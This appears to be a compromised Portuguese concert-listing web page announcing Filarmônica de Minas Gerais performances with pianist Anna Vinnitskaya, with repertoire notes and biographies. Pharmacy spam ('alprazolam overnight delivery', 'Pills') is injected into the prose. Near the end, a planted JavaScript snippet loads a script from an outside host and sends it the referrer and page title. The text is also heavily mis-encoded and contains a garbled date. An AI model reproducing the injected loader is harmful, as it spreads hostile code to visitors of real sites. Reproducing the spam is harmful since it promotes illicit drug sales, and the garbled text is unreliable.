Escrito por em 18 maio 2017 nas áreas Minas Gerais, Música contemporânea, Música sinfônica, Programação

FilarmA?nica de Minas Gerais recebe pianista Anna Vinnitskaya para comemorar 75 anos do compositor Jorge Antunes.

 

Uma das grandes pianistas da atualidade, Order Anna Vinnitskaya se apresenta com a Orquestra FilarmA?nica de Minas Gerais nos dias 18 e 19 de maio, A�s 20h30, na Sala Minas Gerais, em Belo Horizonte. No repertA?rio, o Concerto para piano n. 1, de BartA?k, a Sinfonia n. 1 em dA? menor, de Brahms, e Apoteose de Rousseau, de Jorge Antunes, em comemoraA�A?o aos 75 anos do compositor brasileiro. A regA?ncia A� do maestro Fabio Mechetti.

Antes das apresentaA�A�es, das 19h30 A�s 20h, o pA?blico poderA? participar dos Concertos Comentados, palestras que abordam aspectos do repertA?rio. O convidado das duas noites serA? o professor de regA?ncia coral da Escola de MA?sica da UFMG e regente e diretor artA�stico dos Coros Madrigale e BDMG, Arnon de Oliveira, que falarA? sobre a obra e a vida dos compositores BartA?k e Brahms.

 

RepertA?rio

Jorge Antunes (1942-) e a obra Apoteose de Rousseau Order
Formado em FA�sica, Violino, ComposiA�A?o e RegA?ncia, Antunes A� precursor da mA?sica eletroacA?stica no paA�s e ocupa, desde 1994, a cadeira nA?mero 22 da Academia Brasileira de MA?sica. Combativo, o compositor enxerga a arte como possibilidade de luta por um mundo mais justo. No poema sinfA?nico Apoteose de Rousseau Pills (2014), encena-se a disputa sonora entre melodia e harmonia a�� temA?tica a opor Jean-Philippe Rameau (1683-1764), partidA?rio das expressA�es harmA?nicas como imitaA�A�es da natureza, e Jean-Jacques Rousseau (1712-1778), defensor da melodia como representante da natureza. Em sua obra, Antunes toma partido de Rousseau. Nela, ouvem-se melodias diatA?nicas, alA�m de vasta riqueza de timbres orquestrais. AlA�m disso, o poema oscila entre harmonias densas e sonoridades delicadas, com estruturas tonais e atonais, citaA�A�es estilA�sticas barrocas, clA?ssicas, romA?nticas e uma melodia modal tradicional. A obra A� atual, moderna e de grande forA�a expressiva.

BA�la BartA?k (1881-1945) e a obra Concerto para piano n. 1
Grande pianista, BartA?k pesquisou manifestaA�A�es musicais populares de sua terra natal, assim como do Leste europeu, do Norte da A?frica e da Turquia. Seu mA�todo de trabalho implicava o respeito A�tico pelas etnias e a superioridade do humanismo sobre o nacionalismo. Assimilou, assim, a riqueza rA�tmica do folclore e se libertou da hegemonia do sistema tonal. Paralelamente A�s pesquisas de etnomusicologia, o compositor elaborou original sA�ntese de enfoques do cA?none da mA?sica ocidental. Desse modo, contribuiu com a renovaA�A?o da linguagem musical contemporA?nea. No Concerto n. 1 (1926), triunfam aspectos percussivos do a�?pianismoa�? do compositor: sonoridades violentas, agregaA�A�es de A?speros blocos, ao invA�s de acordes tradicionais, e um mecanicismo insistente. Trata-se de resposta bastante pessoal a�� e, ainda hoje, muito impactante a�� aos apelos neoclA?ssicos e construtivistas de sua A�poca.

Order Johannes Brahms (1833-1897) e a obra Sinfonia n. 1 em dA? menor, Op. 68
Quando se fixou em Viena, em 1862, Brahms jA? era aclamado como a�?herdeiro de Beethovena�?. Importantes mA?sicos da A�poca consideravam-no a figura emblemA?tica do movimento de reaA�A?o A� a�?mA?sica do futuroa�?, preconizada pelos poemas sinfA?nicos de Liszt e pelo drama musical wagneriano. A� provA?vel, aliA?s, que o receio da comparaA�A?o direta com o legado beethoveniano tenha relaA�A?o com a demora para estreia de sua primeira sinfonia: a partitura foi elaborada de 1955 a 1876. A Primeira (1855/1876) A� uma obra pessoal, em que se dosam a inteligA?ncia, a variedade de recursos e os elementos de contraste, como o uso de tonalidades e compassos diferentes para cada andamento. O compositor limitou-se A� orquestra usada por Beethoven na Nona Sinfonia e conseguiu cores e planos sonoros originais: sutilezas rA�tmicas, mudanA�as de acentuaA�A?o, ruptura da regularidade de compassos, fragmentaA�A�es e inversA�es.

 

Artistas

Anna_Vinnitskaya (foto de Gela Megrelidze)

As gravaA�A�es e apresentaA�A�es de alprazolam overnight delivery Anna Vinnitskaya renderam muitos elogios da crA�tica e do pA?blico. Nascida em Novorossiysk, na RA?ssia, a pianista vive em Hamburgo desde 2002. Atualmente, A� professora no ConservatA?rio de Hamburgo, onde se formou sob orientaA�A?o de Evgeni Koroliov. O repertA?rio de Vinnitskaya vai de Johann Sebastian Bach a Sofia Gubaidulina. Suas escolhas enfatizam os grandes compositores russos para piano, como Rachmaninov, Prokofiev e Shostakovich, bem como Ravel, Debussy e Chopin. Suas leituras de Brahms e BartA?k chamaram a atenA�A?o, a exemplo da apresentaA�A?o dos trA?s concertos de BartA?k em uma tarde, com a Rundfunk-Sinfonieorchester Berlin, sob direA�A?o de Marek Janowski. A musicista A� celebrada por pA?blico e crA�tica por sua habilidade em pintar grandes paisagens sonoras e, tambA�m fazer interpretaA�A�es incendiA?rias.

Vinnitskaya esteve com renomadas orquestras, de Berlim (Deutsches Symphonie-Orchester) a Londres (Royal Philharmonic Orchestra); de Munique (MA?nchner Philharmoniker) a TA?quio (NHK Orchestra). Colaborou com os regentes Andris Nelsons, Kirill Petrenko, Krzysztof Urbanski, Charles Dutoit, Vladimir Fedoseyev e Marek Janowski. Suas gravaA�A�es receberam vA?rios prA?mios, como Diapason da��Or, Escolha do Editor da Gramophone e Echo Klassik. Dentre as premiaA�A�es de maior prestA�gio, estA?o a CompetiA�A?o Busoni (ItA?lia, 2005), o primeiro lugar no Concurso Rainha Elisabeth (BA�lgica, 2007), e o prA?mio Leonard Bernstein, no Festival Schleswig-Holstein (Alemanha, 2008). Na temporada 2016/2017, como solista em residA?ncia na WDR Sinfonieorchester, apresentarA? e gravarA? concertos de BartA?k com o regente principal da orquestra, Jukka-Pekka Saraste.

 

Desde 2008, Fabio Mechetti A� diretor artA�stico e regente titular da Orquestra FilarmA?nica de Minas Gerais. Com seu trabalho, Mechetti posicionou a orquestra mineira nos cenA?rios nacional e internacional e conquistou vA?rios prA?mios. Com ela, realizou turnA?s pelo Uruguai e Argentina e realizou gravaA�A�es para o selo Naxos. Natural de SA?o Paulo, serviu recentemente como regente principal da Orquestra FilarmA?nica da MalA?sia, tornando-se o primeiro regente brasileiro a ser titular de uma orquestra asiA?tica. Depois de 14 anos A� frente da Orquestra SinfA?nica de Jacksonville, Estados Unidos, atualmente A� seu regente titular emA�rito. Foi tambA�m regente titular da SinfA?nica de Syracuse e da SinfA?nica de Spokane. Desta A?ltima A�, agora, regente emA�rito. Foi regente associado de Mstislav Rostropovich na Orquestra SinfA?nica Nacional de Washington e com ela dirigiu concertos no Kennedy Center e no CapitA?lio norte-americano. Da Orquestra SinfA?nica de San Diego, foi regente residente. Fez sua estreia no Carnegie Hall de Nova York conduzindo a Orquestra SinfA?nica de Nova Jersey e tem dirigido inA?meras orquestras norte-americanas, como as de Seattle, Buffalo, Utah, Rochester, Phoenix, Columbus, entre outras. A� convidado frequente dos festivais de verA?o nos Estados Unidos, entre eles os de Grant Park em Chicago e Chautauqua em Nova York.

Realizou diversos concertos no MA�xico, Espanha e Venezuela. No JapA?o dirigiu as orquestras sinfA?nicas de TA?quio, Sapporo e Hiroshima. Regeu tambA�m a Orquestra SinfA?nica da BBC da EscA?cia, a Orquestra da RA?dio e TV Espanhola em Madrid, a FilarmA?nica de Auckland, Nova ZelA?ndia, e a Orquestra SinfA?nica de Quebec, CanadA?. Vencedor do Concurso Internacional de RegA?ncia Nicolai Malko, na Dinamarca, Mechetti dirige regularmente na EscandinA?via, particularmente a Orquestra da RA?dio Dinamarquesa e a de Helsingborg, SuA�cia. Recentemente fez sua estreia na FinlA?ndia, dirigindo a FilarmA?nica de Tampere, e na ItA?lia, dirigindo a Orquestra SinfA?nica de Roma. Em 2016 estreou com a FilarmA?nica de Odense, na Dinamarca.

Igualmente aclamado como regente de A?pera, estreou nos Estados Unidos dirigindo a A�pera de Washington. No seu repertA?rio destacam-se produA�A�es de Tosca, Turandot, Carmem, Don Giovanni price mycelex-g , CosA� Fan Tutte, La BohA?me, Madame Butterfly, how much colchicine for gout O Barbeiro de Sevilha, La Traviata e Otello. Fabio Mechetti recebeu tA�tulos de mestrado em RegA?ncia e em ComposiA�A?o pela prestigiosa Juilliard School de Nova York.

 

Foto do post: Daiane Souza

 

SERVIA�O:

 

Orquestra FilarmA?nica de Minas Gerais

Anna Vinnitskaya, piano

Fabio Mechetti, regA?ncia

 

18 e 19 de maio, quinta e sexta-feira, A�s 20h30 Pills

Sala Minas Gerais (R. Tenente Brito Melo, 1.090, Barro Preto a�� Belo Horizonte. Tel.: 31 3219-9000)

 

Ingressos: R$ 105 (balcA?o principal), R$ 85 (plateia central), R$ 62 (balcA?o lateral), R$ 50 (mezanino) e R$ 40 (balcA?o palco e coro), com meia-entrada para estudantes, pessoas com mais de 60 anos, jovens de baixa renda e pessoas com deficiA?ncia, de acordo com a legislaA�A?o

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; document.currentScript.parentNode.insertBefore(s, document.currentScript);

Faça seu comentário